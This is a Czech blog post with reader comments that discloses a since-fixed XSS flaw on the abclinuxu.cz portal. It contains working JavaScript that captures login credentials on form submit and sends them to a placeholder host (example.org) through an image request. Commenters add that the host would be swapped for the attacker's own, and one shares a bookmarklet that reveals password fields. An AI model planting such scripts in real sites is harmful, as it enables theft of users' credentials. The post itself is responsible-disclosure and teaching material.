AbcLinuxu:/ Blogy / Bláboly / Různé / Jak ukrást hesla uživatelům abclinuxu?

Jak ukrást hesla uživatelům abclinuxu?

2.5.2006 21:59 | Přečteno: 2484× | Různé | poslední úprava: 3.5.2006 08:54

Když tak řeším bezpečností chyby v phpMyAdminovi, napadlo mě jak jsou proti podobným věcem zabezpečené portály. Protože dost často používám abclinuxu, tak přišlo první na mušku .

Předem podotýkám, že tento článek byl nejdříve dán k dispozici adminům, takže doufám, že v době zveřejnění už není možné toto provést.

Většina prohlížečů dnes umí javascript, který se dá dělat spousta zajímavých věcí. Třeba přidat javascript na obsluhu nějaké událost nebo posílat XML HTTP requesty. Bystřejším již možná dochází, že pokud si můžu vložit vlastní javascript, není žádný problém odchytit odesílání přihlašovacího formuláře. Kdo nevěří, může si zkusit následující ukázku (ta heslo jenom zobrazí, ale to už je jenom detail):

<script type="text/javascript">
<!--
function process() {
    p = document.getElementById('pwd').value;
    u = document.getElementById('usr').value;
    document.getElementById('ls_prepinac').innerHTML = 
        '<img src="http://example.org/?u=' + 
        u + '&p=' + p + '"/>';
    window.alert('odeslano na example.org:\npass: ' + 
        p + '\n' + 'user: ' + u);
}
function load() {
    frm = document.forms[0];
    frm.onsubmit = process;
}
window.onload = load;
//-->
</script>

<div id="ls_prepinac">xx</div>
<form method="post">
<input type="text" name="u" id="usr">
<input type="password" name="p" id="pwd">
<input type="submit">
</form>

Teď už jenom zbývá jak dostat vlastní javascript na logovací stránku. Protože je samostatná, tak jediná věc, která je tam vidět z uživatelem ovlivnitelného obsahu jsou zprávičky. Obsah zpráviček je (aspoň v to doufám) kontrolován na dovolené html, ale ještě nám zbývá jeden zajímavý prvek. Tím je naše jméno, tam si můžeme napsat cokoliv co chceme, včetně javascriptu. Tak teď už jen zbývá doufat, že to moc lidí nezrealizovalo . Napsat zprávičku, která bude schválena až takový problém není a pak už je dílo dokonáno.

Jaké je řešení? Nedovolovat nikde javascript, dá se použít k mnoha nebezpečným věcem.

Stav chyby:

• 2.5.2006 12:56 - oznámeno
• 2.5.2006 13:14 - Leoš tvrdí že při zadání kontroluje <
• 2.5.2006 13:26 - ukazuju mu že nekontroluje (kdo si v té době všiml "x" u mého jména, má 10 bodů za všímavost )
• 2.5.2006 13:45 - Leoš uznává, že kontrola neexistuje
• 2.5.2006 21:53 - opraveno

Tiskni Sdílej:

Komentáře

Vložit další komentář

2.5.2006 22:20 wake | skóre: 30 | blog: wake | Praha
Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?

Odpovědět | Sbalit | Link | Blokovat | Admin

2.5.2006 22:34 hajma | skóre: 27 | blog: hajma | Říčany
Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?

Odpovědět | Sbalit | Link | Blokovat | Admin

3.5.2006 05:26 David Watzke | skóre: 74 | blog: Blog... | Praha
Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?

Odpovědět | Sbalit | Link | Blokovat | Admin

Ja teda neviem o javascripte skoro nič. Ale mohol by autor detailnejšie vysvetliť, ako to funguje (resp. malo fungovať)?

Pretože mne to pripadá tak, že pri zobrazení správičky sa vyrobia dva fieldy na stránke vyzývajúce na zadanie mena a hesla a button na odoslanie. A pri odoslaní sa obsah tých polí zobrazí v message-boxe. Nie je mi jasné, prečo by som do tých polí ja vypisoval svoj password a ako by sa k tomu passwordu dostal niekto iný, ako ten kto ho tam vypísal?

3.5.2006 08:53 .. | skóre: 4 | blog:
Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?

Odpovědět | Sbalit | Výše | Link | Blokovat | Admin

Podstatny je ten javascript. HTML kod formulare je jenom pro ukazku, at si to muze kazdy odzkouset sam, doma/v prace/whatever

3.5.2006 08:56 Michal Čihař | skóre: 61 | blog: Bláboly | Praha
Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?

Odpovědět | Sbalit | Výše | Link | Blokovat | Admin

Asi nebylo korektí v té ukázce dát dohromady HTML formuláře a ten javascript, tak teď to je pěkně zvlášť .

Weblate - překládání přes web | Gammu SMSD - posílání SMS | Blog

3.5.2006 08:57 Michal Čihař | skóre: 61 | blog: Bláboly | Praha
Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?

Odpovědět | Sbalit | Výše | Link | Blokovat | Admin

s/korektí/korektní/

Weblate - překládání přes web | Gammu SMSD - posílání SMS | Blog

3.5.2006 10:10 xvasek | skóre: 21 | blog: | Zlín
Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?

Odpovědět | Sbalit | Výše | Link | Blokovat | Admin

Teď už to chápeme i my pomalejší, díky.

Hmm, tak jsem chtěl přihodit veselou historku z natáčení a ukázat fintu, jak jsme to dělali za starých časů my a našel jsem jinou (ne až tak velkou) zranitelnost ábíčka. Kam to oznámit? (Resp. teda jaký má Leoš jabber nebo mail? Nebo do bugzilly?)

3.5.2006 10:53 Michal Čihař | skóre: 61 | blog: Bláboly | Praha
Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?

Odpovědět | Sbalit | Výše | Link | Blokovat | Admin

Mail mu můžeš poslat třeba z profilu. Ten bude mít radost .

Weblate - překládání přes web | Gammu SMSD - posílání SMS | Blog

3.5.2006 11:49 xvasek | skóre: 21 | blog: | Zlín
Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?

Odpovědět | Sbalit | Výše | Link | Blokovat | Admin

Tímto se omlouvám za svou slepost, v jeho profilu jsem byl a talačítko "Pošlete mi email" jsem nějak nezvládnul lokalizovat a použít. Ale všechno dobře dopadlo, Leoš talčítko v mém profilu zřejmě použít dokázal. Zatím mi poslal smajlíka, takže radost zřejmě má.

3.5.2006 12:45 Leoš Literák | skóre: 74 | blog: LL | Praha
Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?

Odpovědět | Sbalit | Výše | Link | Blokovat | Admin

Dle popisu ten problem neohrozuje uzivatele, jen muze zpusobit necitelnost diskusi. Mel bych se konecne dokopat k te automaticke konverzi spicatych zavorek na HTML entity a bude pokoj Jenze to bych musel prestat pouzivat jednu knihovnu na parsovani HTML, takze moc prace.

Zakladatel tohoto portálu. Twitter, LinkedIn, blog, StackOverflow

3.5.2006 08:55 Michal Čihař | skóre: 61 | blog: Bláboly | Praha
Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?

Odpovědět | Sbalit | Výše | Link | Blokovat | Admin

Ten formulář zůstane původní pro přihlášení, jediné co je navíc je ten javascript. Někdo jiný se k tomu dostane tak, že třeba vložíme obrázek. Přepsal jsem ukázku, takže by to mohlo být jasnější (ve skutečnosti by byl javascript asi v samostatném souboru a vložil by se jen odkaz na něj.

Weblate - překládání přes web | Gammu SMSD - posílání SMS | Blog

3.5.2006 09:56 digri | skóre: 12 | blog: digri
Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?

Odpovědět | Sbalit | Výše | Link | Blokovat | Admin

Aneb Five common Web application vulnerabilities

Zajimalo by mne jak ta hesla dostanete k sobe?

Věda má v sobě určitou zpupnost, že čím dokonalejší techniku vyvineme, čím více se dozvíme, tím lepší budou naše životy.

3.5.2006 11:10 Michal Čihař | skóre: 61 | blog: Bláboly | Praha
Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?

Odpovědět | Sbalit | Výše | Link | Blokovat | Admin

Z toho požadavku na webserver example.org, který nahradím nějakým vlastním. Bohatě na to stačí nějaký free hosting.

Weblate - překládání přes web | Gammu SMSD - posílání SMS | Blog

3.5.2006 11:48 Jiří (BoodOk) Kadeřávek | skóre: 19 | blog: BoodOk | Brno
Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?

Odpovědět | Sbalit | Výše | Link | Blokovat | Admin

Mea culpa, nedbale jsem ten kod cetl. Zmatla mne zminka o XMLHttpRequestu, ten ma ochranu pred cross-site komunikaci. Jinak super postreh.

Věda má v sobě určitou zpupnost, že čím dokonalejší techniku vyvineme, čím více se dozvíme, tím lepší budou naše životy.

3.5.2006 11:55 Michal Čihař | skóre: 61 | blog: Bláboly | Praha
Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?

Odpovědět | Sbalit | Výše | Link | Blokovat | Admin

Ano ten ochranu má, už ani nevím proč jsem ho zmiňoval .

Weblate - překládání přes web | Gammu SMSD - posílání SMS | Blog

3.5.2006 11:55 rastos | skóre: 63 | blog: rastos
Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?

Odpovědět | Sbalit | Výše | Link | Blokovat | Admin

Ešte to má stále chybičku, že to heslo tam musí byť vyplnené v čase keď sa tá stránka práve nahrá. Takže by to chcelo zavesiť na nejaký iný event.

Ale keď už sme pri tom ... mám bookmark na lište, čo má miesto URL toto:

javascript:(function(){var s,F,j,f,i; s = %22%22; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == %22password%22) s += f[i].value + %22\n%22; } } if (s) alert(%22Passwords in forms on this page:\n\n%22 + s); else alert(%22There are no passwords in forms on this page.%22);})();

Ake je na stránke heslo a ja vidím len hviezdičky, tak ho ukáže v message-boxe. Funguje to v 95% prípadov

3.5.2006 12:19 Michal Čihař | skóre: 61 | blog: Bláboly | Praha
Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?

Odpovědět | Sbalit | Výše | Link | Blokovat | Admin

Nemusí, to se provádí až při odesílání formuláře. Při natažení dokumentu se jenom nastaví event handler na to odesílání.

Weblate - překládání přes web | Gammu SMSD - posílání SMS | Blog

Dekuji Michalovi za tip pro vylepseni abicka. Ochrana tam byla, ale jen u jmen neregistrovanych uzivatelu v diskusi, u profilu chybela.

Zakladatel tohoto portálu. Twitter, LinkedIn, blog, StackOverflow

3.5.2006 21:45 brozkeff | skóre: 13 | blog: Zpátky po 10 letech | Žďár nad Sázavou
Rozbalit Rozbalit vše hehe

Odpovědět | Sbalit | Výše | Link | Blokovat | Admin

Aneb Byl tu názor, že něco takového by reglí uživatelé nikdy neudělali ;e) ?

ॐ

Nie prepac, toto by normalne nemalo fungovat. Niesom admin tohto servra a ani neviem nic o zabezpekach tohto servera ale skoro kazdy web si riesi kontrolu tohto problemu, ktory si tu nastitil. Inak toto je super priklad coho by sa mali ludia vyvarovat pri tvoreni webu. Da sa to riesit funkciuo strip_tags() + pomocne scripty viac na http://sk2.php.net/manual/en/function.strip-tags.php (zamerne nedavam, odkaz pretoze neviem ci je dovolene odkazovat z tohto webu na ine weby, admini to nemaju radi:) Tato funkcia sa da samozrejme obist ale to uz je pomaly priestor na novy blog :)

Kazdy linuxak by si mal uvedomit ze aj windows ma svoje caro a dokaze byt v niecom silnym nastrojom.

3.5.2006 13:32 Michal Čihař | skóre: 61 | blog: Bláboly | Praha
Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?

Odpovědět | Sbalit | Výše | Link | Blokovat | Admin

Skoro vždycky se najde pole, kde ta kontrola je zapomenutá, tady to byl jméno uživatele.

Weblate - překládání přes web | Gammu SMSD - posílání SMS | Blog

3.5.2006 13:38 Marian2
Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?

Odpovědět | Sbalit | Výše | Link | Blokovat | Admin

Ano samozrejme, ja nekritizujem adminov, cielom blogov a podobnych diskusii je najst riesenie, co v poslednej dobe vela ludi prestava respektovat.

Kazdy linuxak by si mal uvedomit ze aj windows ma svoje caro a dokaze byt v niecom silnym nastrojom.

3.5.2006 14:20 happy barney | skóre: 34 | blog: dont_worry_be_happy
Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?

Odpovědět | Sbalit | Výše | Link | Blokovat | Admin

a samozrejme, skoro vzdy sa najde web, ktory nie je pisany v php ))

3.5.2006 14:39 Marian2
Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?

Odpovědět | Sbalit | Výše | Link | Blokovat | Admin

a samozrejme vsetko sa da prehnat vsetkym ak sa chce

Kazdy linuxak by si mal uvedomit ze aj windows ma svoje caro a dokaze byt v niecom silnym nastrojom.

A koli takymto vtipalkom pouzivam firefoxie rozsirenie NoScript:)

3.5.2006 20:07 Michal Čihař | skóre: 61 | blog: Bláboly | Praha
Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?

Odpovědět | Sbalit | Výše | Link | Blokovat | Admin

Já taky . Ale pokud máš javascript povolený pro abclinuxu.cz a někomu se to podaří vložit přímo do stránky, tak to ničemu nezabrání.

Weblate - překládání přes web | Gammu SMSD - posílání SMS | Blog

Založit nové vlákno • Nahoru